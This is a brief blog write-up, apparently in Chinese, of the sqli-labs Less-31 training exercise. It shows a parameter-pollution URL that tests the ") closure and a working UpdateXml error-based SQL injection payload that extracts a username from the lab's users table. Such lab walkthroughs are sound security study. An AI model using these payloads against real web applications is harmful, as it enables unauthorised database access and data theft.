【sqli-labs】 less31 GET- Blind -Impidence mismatch -Having a WAF in front of web application (GET型基于盲注的带有WAF注入)

标题和less30一样

http://192.168.136.128/sqli-labs-master/Less-31/login.php?id=1&id=2"

")闭合的

http://192.168.136.128/sqli-labs-master/Less-31/login.php?id=1&id=2")and UpdateXml(1,concat(0x7e,(select username from users limit 2,1),0x7e),1)%23

 

posted @ 2018-01-29 21:18  omnis  阅读(176)  评论(0编辑  收藏  举报